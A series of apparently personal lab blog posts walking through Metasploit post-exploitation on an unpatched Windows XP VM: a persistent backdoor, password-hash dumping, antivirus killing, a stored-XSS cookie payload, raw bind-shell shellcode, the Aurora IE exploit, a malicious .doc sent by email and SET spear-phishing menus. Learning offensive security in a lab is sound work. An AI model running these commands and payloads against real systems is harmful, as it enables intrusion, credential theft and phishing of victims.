meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "lab"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

And up popped the target machine desktop:

[Screenshot: meterpreter_vnc]


Metasploit Meterpreter: Sniffing traffic on exploited system – Packetrecorder


This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/LAB_20130625.5807/LAB_20130625.5807.cap
[*] Packet capture interval is 30 Seconds

^C <-- Control+C to stop the process
[*] Interrupt
[+] Stopping Packet sniffer...
meterpreter >

The file is saved in the folder .MSF4, which is a hidden folder in Kali within Root.

Rather conveniently, everything logged by Packetrecorder is saved in the .pcap file format which is perfect for Wireshark:

[Screenshot: packetrecorder]

And 192.168.1.79 is the IP of the target machine.

Metasploit Meterpreter: Creating a persistent backdoor connection


This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The following Meterpreter persistence script ensures access to the exploited system even after a reboot. This script comes with a warning:

One word of warning here before we go any further. The persistent Meterpreter as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, be sure to exercise the utmost caution and be sure to clean up after yourself when the engagement is done.

Here’s the Persistence options:

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back

On to the Meterpreter script:

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.79
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/LAB_20130625.2221/LAB_20130625.2221.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.79 LPORT=443
[*] Persistent agent script is 611063 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[*] Executing script C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[+] Agent executed with PID 2520
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
meterpreter >

I have rebooted the target machine and will now test the connection from Metasploit.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.1.79
LHOST => 192.168.1.79
msf exploit(handler) > exploit

[-] Handler failed to bind to 192.168.1.79:443
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

And it stuck there.

No idea why this didn’t work.

Metasploit Meterpreter: Migrate a process and obtain system password hashes


This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

I attempted to obtain the password hashes from the exploited system:

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22...
[*] Obtaining the user list and keys...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_query_value: Operation failed: The handle is invalid.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

But this failed and hinted that I should migrate into service process, which I did:

meterpreter > run post/windows/manage/migrate

[*] Running module against LAB
[*] Current server process: ALqkE.exe (3740)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3672
[+] Successfully migrated to process 3672

After which run hashdump worked perfectly.

I have blogged on obtaining the password hashes previously.

Metasploit Meterpreter: Killing Antivirus Software on Exploited System – Killav


This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The following disables most antivirus programs:

meterpreter > run killav
[*] Killing Antivirus services on the target...
meterpreter >

Simple as that.

Metasploit: Listing Meterpreter Post Exploitation Modules


This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

A great way to view Meterpreter post exploitation modules is “run post/” followed by the tab key:

meterpreter > run post/
Display all 144 possibilities? (y or n)
run post/multi/gather/apple_ios_backup
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/multi_command
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/run_console_rc_file
run post/multi/gather/skype_enum
run post/multi/gather/thunderbird_creds
run post/multi/general/close
run post/multi/general/execute
run post/multi/manage/multi_post
run post/multi/manage/record_mic
run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/bypassuac
--More--

Metasploit Meterpreter Railgun: Post Exploit Windows API Manipulation


Metasploit: The Penetration Tester’s Guide has this to say about Railgun:

You can interface with the Windows native API directly through a Metasploit add-on called Railgun.

[....]

Railgun gives you the same capabilities as a native Win32 application with full access to the Windows API.

Here’s Wiki on Native API:

The Native API (with capitalized N) is the mostly undocumented application programming interface (API) used internally by the Windows NT family of operating systems produced by Microsoft.[1] It is predominately used during system boot, when other components of Windows are unavailable, and by routines such as those in kernel32.dll that implement the Windows API. The program entry point is called DriverEntry(), the same as for a Windows device driver. However, the application runs in ring 3 the same as a regular Windows application. Most of the Native API calls are implemented in ntoskrnl.exe and are exposed to user mode by ntdll.dll. Some Native API calls are implemented in user mode directly within ntdll.dll.

While most of Microsoft Windows is implemented using the documented and well-defined Windows API, a few components, such as the Client/Server Runtime Subsystem, are implemented using the Native API, as they can be started earlier in the Windows NT Startup Process when the Windows API is not yet available.

Some malware makes use of the Native API to hide its presence from malware detection software.

Railgun operates through an Interactive Ruby Shell (irb) within Meterpreter, which is cool as I’m learning Ruby. I followed the instructions given in the above book to create a pop-up on an exploited Windows machine by calling the MessageBoxA function in user32.dll.

Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

And in the terminal:

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

I took a screenshot from Meterpreter:

[Screenshot: railgun]

And you can see the pop-up box on the exploited machine. The above book describes the power and implications of Railgun as huge, but then covers no further details and suggests reading the Framework tutorial. I think this is something I will have to return to once I’ve learned the basics of Metasploit.

In the meantime, this video was informative:

OWASP WebGoat: Stored XSS Attacks


Here’s OWASP’s lesson principle:

Lesson Plan Title: How to Perform Stored Cross Site Scripting (XSS)

Concept / Topic To Teach:

It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user’s message is retrieved.

General Goal(s):

The user should be able to add message content that causes another user to load an undesirable page or content.

Quite a straightforward lesson. Input anything you like in the "Title" box, then <script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script> in the message section, and submit.

Check underneath the "Message List" for your Title; click it and a popup box appears with "Ha Ha Ha".

Again, input anything in the "Title" box and then <script language="javascript" type="text/javascript">alert(document.cookie);</script> in the message section, and a popup with your session ID will appear.
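The fix the lesson principle points at, as an added Ruby example that is not part of WebGoat or of the original post: a message list rendered raw (the behaviour the lesson exploits) beside one that HTML-escapes every stored field at output time, both fed the two payloads quoted above. The function names and the sample messages are constructed.

```ruby
require 'cgi'

# Constructed sample of stored messages: a harmless one and the two payloads
# quoted in the lesson above.
SAMPLE_MESSAGES = [
  { title: "Hello",  body: "Just saying hi." },
  { title: "Test 1", body: %q{<script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script>} },
  { title: "Test 2", body: %q{<script language="javascript" type="text/javascript">alert(document.cookie);</script>} }
].freeze

# Vulnerable rendering (what the lesson exploits): stored fields are dropped
# straight into the markup, so a stored <script> runs for every viewer.
def render_message_list_vulnerable(messages)
  rows = messages.map { |m| "<li><b>#{m[:title]}</b>: #{m[:body]}</li>" }
  "<ul>\n#{rows.join("\n")}\n</ul>"
end

# Hardened rendering: every stored field is HTML-escaped at output time, so
# the same payload is shown as literal text and is never parsed as a tag.
def render_message_list_safe(messages)
  rows = messages.map do |m|
    "<li><b>#{CGI.escapeHTML(m[:title])}</b>: #{CGI.escapeHTML(m[:body])}</li>"
  end
  "<ul>\n#{rows.join("\n")}\n</ul>"
end

# Crude regression check on the rendered page: is there still a real
# <script ...> start tag in it? (An escaped payload contains "&lt;script".)
def contains_script_tag?(html)
  html.match?(/<script\b/i)
end

if __FILE__ == $PROGRAM_NAME
  puts render_message_list_safe(SAMPLE_MESSAGES)
end
```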

Here’s a video showing you the process:


Metasploit: Experimenting with Immunity Debugger, NOP’s, Opcode, Assembly Instructions and Shellcode


I’m following the instructions given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

It’s worth watching this excellent video which demonstrates the process I describe below:

First I download Immunity Debugger onto the Windows portion of my Virtual Hacking Lab.

Next, I create the shellcode in Metasploit. I used port 446 as I initially struggled with port 443:

~# msfpayload windows/shell/bind_tcp LPORT=446 C
/*
* windows/shell/bind_tcp - 298 bytes (stage 1)
* http://www.metasploit.com
* VERBOSE=false, LPORT=446, RHOST=, EnableStageEncoding=false,
* PrependMigrate=false, EXITFUNC=process,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31"
"\xdb\x53\x68\x02\x00\x01\xbe\x89\xe6\x6a\x10\x56\x57\x68\xc2"
"\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53"
"\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d"
"\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3";

/*
* windows/shell/bind_tcp - 240 bytes (stage 2)
* http://www.metasploit.com
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89"
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44"
"\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"
"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5"
"\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb"
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

I’m only interested in the "Stage 1" code, to which I add a few \x90 bytes at the beginning; in Intel x86 assembly language 0x90 is the no-operation (NOP) instruction. I then remove all the quotation marks and \x occurrences and am left with:

909090909090909090909090909090
909090909090909090909090909090
909090909090909090909090909090
fce8890000006089e531d2648b5230
8b520c8b52148b72280fb74a2631ff
31c0ac3c617c022c20c1cf0d01c7e2
f052578b52108b423c01d08b407885
c0744a01d0508b48188b582001d3e3
3c498b348b01d631ff31c0acc1cf0d
01c738e075f4037df83b7d2475e258
8b582401d3668b0c4b8b581c01d38b
048b01d0894424245b5b61595a51ff
e0585f5a8b12eb865d683332000068
7773325f54684c772607ffd5b89001
000029c454506829806b00ffd55050
50504050405068ea0fdfe0ffd59731
db5368020001be89e66a10565768c2
db3767ffd5535768b7e938ffffd553
53576874ec3be1ffd5579768756e4d
61ffd56a006a0456576802d9c85fff
d58b366a406800100000566a006858
a453e5ffd593536a005653576802d9
c85fffd501c329c685f675ecc3
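The conversion described above, written out as an added Ruby script that is not part of the book or of the original post: keep only the stage-1 array from the msfpayload C output, prepend a NOP sled, and emit the hex rows in the layout that was pasted into Immunity Debugger. The embedded listing is a constructed excerpt holding just the first two lines of the stage-1 bytes shown above, plus a short stand-in for stage 2 so the "first array only" rule is exercised.

```ruby
NOP = 0x90  # x86 single-byte no-operation instruction

# Constructed excerpt of the msfpayload C output shown above: the first two
# source lines of stage 1 (30 bytes) and a truncated stand-in for stage 2.
SAMPLE_MSFPAYLOAD_C = <<~'C'
  /*
   * windows/shell/bind_tcp - 298 bytes (stage 1)
   */
  unsigned char buf[] =
  "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
  "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff";

  /*
   * windows/shell/bind_tcp - 240 bytes (stage 2)
   */
  unsigned char buf[] =
  "\xfc\xe8\x89\x00\x00\x00\x60";
C

# Return the bytes of the FIRST `unsigned char buf[] = "..." ;` array only:
# msfpayload prints one array per stage and only stage 1 is wanted here.
def extract_stage1_bytes(c_text)
  m = c_text.match(/unsigned char buf\[\]\s*=\s*(.*?);/m)
  raise ArgumentError, "no unsigned char buf[] array found" unless m
  m[1].scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |hex| hex.to_i(16) }
end

# Prepend sled_len NOPs, then format as lowercase hex with per_line bytes per
# row, which is the 30-character row layout of the listing above.
def debugger_paste_lines(bytes, sled_len:, per_line: 15)
  sled = Array.new(sled_len, NOP)
  (sled + bytes).each_slice(per_line).map do |row|
    row.map { |b| format("%02x", b) }.join
  end
end

# Full pipeline: C listing in, paste-ready hex rows out. 45 NOPs gives the
# three rows of 90s seen above.
def build_debugger_paste(c_text, sled_len: 45)
  debugger_paste_lines(extract_stage1_bytes(c_text), sled_len: sled_len)
end

if __FILE__ == $PROGRAM_NAME
  puts build_debugger_paste(SAMPLE_MSFPAYLOAD_C)
end
```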

I then open Immunity Debugger (ID) on the target machine and open iexplore.exe.

In the main ID screen I paste in the above code and create breaks at the start and end of my code.

I then ran the exploit in Metasploit on the attacking machine to see if I could bind with port 446:

msf > use multi/handler
msf exploit(handler) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(handler) > set LPORT 446
LPORT => 446
msf exploit(handler) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.79
[*] Command shell session 1 opened (192.168.1.70:39979 -> 192.168.1.79:446) at 2013-07-10 10:14:46 +0100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Internet Explorer>

And as you can see the connection was duly established.

Metasploit Meterpreter: Internet Explorer “Aurora” Memory Corruption Client-Side Exploit


I’m following the instructions given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Metasploit describes this exploit thus:

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the “Operation Aurora” attacks that led to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample; as such, only Internet Explorer 6 can be reliably exploited.

This is my first client-side exploit and I must say I rather enjoyed it.

Firstly to Metasploit to set up the exploit:

msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.1.70 <-- This is my IP (the attacking machine)
LHOST => 192.168.1.70
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.70:443
[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.1.70:80/
[*] Server started.

Then I opened Internet Explorer on the target Windows system and entered the IP of the attacking machine in the browser.

At the same time I opened the Task Manager and watched the memory usage for iexplore.exe jump from 3-5,000K to over 300,000K as the exploit filled the heap.

Back to the attacking machine and Metasploit:

msf exploit(ms10_002_aurora) > [*] 192.168.1.79 ms10_002_aurora - Sending Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1115) at 2013-07-19 14:53:29 +0100

msf exploit(ms10_002_aurora) >

I then wanted a Meterpreter shell:

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

I took a screenshot of the victim machine:

meterpreter > screenshot

[Screenshot: aurora]

I then wanted to escalate my privileges:

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

I thought I’d best migrate the process in case Explorer was shut down:

meterpreter > run post/windows/manage/migrate

[*] Running module against LAB
[*] Current server process: IEXPLORE.EXE (3156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2720
[+] Successfully migrated to process 2720
meterpreter >

Job done and good fun.

Metasploit Meterpreter: MS11-006 Client-Side Malicious Document Exploit – Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow


I’m following the instructions given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Metasploit describes this exploit thus:

This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.
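A defender's sanity check for the field the description names, as an added Ruby example that is not from Metasploit or the original post: parse a standalone 40-byte BITMAPINFOHEADER and flag a biClrUsed that is negative when read as signed, or larger than the palette its bit depth allows. It assumes the thumbnail header has already been extracted from the document; the two sample headers are constructed.

```ruby
BITMAPINFOHEADER_SIZE = 40

# BITMAPINFOHEADER, all little-endian: biSize, biWidth, biHeight, biPlanes,
# biBitCount, biCompression, biSizeImage, biXPelsPerMeter, biYPelsPerMeter,
# biClrUsed (DWORD at offset 32), biClrImportant.
HEADER_FORMAT = "Vl<l<vvVVl<l<VV".freeze
HEADER_FIELDS = %i[size width height planes bit_count compression
                   size_image xppm yppm clr_used clr_important].freeze

def parse_bitmapinfoheader(raw)
  if raw.bytesize < BITMAPINFOHEADER_SIZE
    raise ArgumentError, "need #{BITMAPINFOHEADER_SIZE} bytes, got #{raw.bytesize}"
  end
  HEADER_FIELDS.zip(raw.byteslice(0, BITMAPINFOHEADER_SIZE).unpack(HEADER_FORMAT)).to_h
end

# Reinterpret an unsigned 32-bit value as the signed value a careless consumer
# would see: 0xFFFFFFFF becomes -1.
def as_signed32(value)
  [value].pack("V").unpack("l<").first
end

# Return a list of findings (empty for a sane header). biClrUsed is unsigned
# on the wire; the overflow described above arises when it is treated as
# signed, so both views are checked.
def check_thumbnail_header(raw)
  h = parse_bitmapinfoheader(raw)
  findings = []
  unless h[:size] == BITMAPINFOHEADER_SIZE
    findings << "biSize is #{h[:size]}, expected #{BITMAPINFOHEADER_SIZE}"
  end
  signed = as_signed32(h[:clr_used])
  if signed < 0
    findings << format("biClrUsed 0x%08x reads as %d when treated as signed", h[:clr_used], signed)
  end
  if h[:bit_count].between?(1, 8) && h[:clr_used] > (1 << h[:bit_count])
    findings << "biClrUsed #{h[:clr_used]} exceeds the #{1 << h[:bit_count]}-entry palette of a #{h[:bit_count]}-bit image"
  end
  findings
end

# Constructed sample headers for a 32x32, 8-bit, uncompressed thumbnail.
def sample_header(clr_used)
  [BITMAPINFOHEADER_SIZE, 32, 32, 1, 8, 0, 32 * 32, 2835, 2835, clr_used, 0].pack(HEADER_FORMAT)
end
BENIGN_THUMBNAIL_HEADER  = sample_header(256)
SUSPECT_THUMBNAIL_HEADER = sample_header(0xFFFF_FFFF)  # -1 when read as signed

if __FILE__ == $PROGRAM_NAME
  puts check_thumbnail_header(SUSPECT_THUMBNAIL_HEADER)
end
```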

The first step is to create the malicious document within Metasploit:

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set outputpath /root/ <-- I changed the output directory as the original one didn't exist.
outputpath => /root/
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.70 <-- Attacking machine.
LHOST => 192.168.1.70
msf exploit(ms11_006_createsizeddibsection) > set LPORT 447 <-- Attacking machine port.
LPORT => 447
msf exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /root/msf.doc <-- File created.

I then emailed the created “malicious” file as an attachment, to be opened on the target Windows machine. I was very impressed with Google Gmail, as it rejected the email and noted:

Our system detected an illegal attachment on your message

So, I had to send the file via another web based mail system.

Before opening the file on the target Windows system, I needed to set up the attacking machine to listen for incoming connections from the target machine:

msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(handler) > set LPORT 447
LPORT => 447
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.70:447
[*] Starting the payload handler...

I then opened the malicious file on the target machine and viewed as a thumbnail in the hope it would trigger the exploit; however, nothing happened, and the hack failed.

Microsoft lists the Windows versions affected by this exploit and my 32-bit XP Pro SP2 is not listed, so perhaps this is the reason the exploit failed. The above book states the Windows system should be SP3, which mine is not.

A little disappointed.

Anyway, here’s a nice step-by-step guide to this exploit.

And this video may or may not be useful:

The Social-Engineer Toolkit (SET) and Metasploit: Spear-Phishing Attack Vectors


This post follows the instructions given in chapter ten (The Social-Engineer Toolkit) of Metasploit: The Penetration Tester’s Guide; previous post here.

Here’s what we’re greeted with in the terminal on starting The Social-Engineer Toolkit (SET):

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

We’ll select option one and are shown the following:

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

And select one again.

The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

We’ll select one again:

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5) Adobe Flash Player “Button” Remote Code Execution
6) Adobe CoolType SING Table “uniqueName” Overflow
7) Adobe Flash Player “newfunction” Invalid Pointer Use
8) Adobe Collab.collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Apple QuickTime PICT PnSize Buffer Overflow
18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
19) Adobe Reader u3D Memory Corruption Vulnerability
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

We’ll select eight, which is a heap-based exploit.

1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
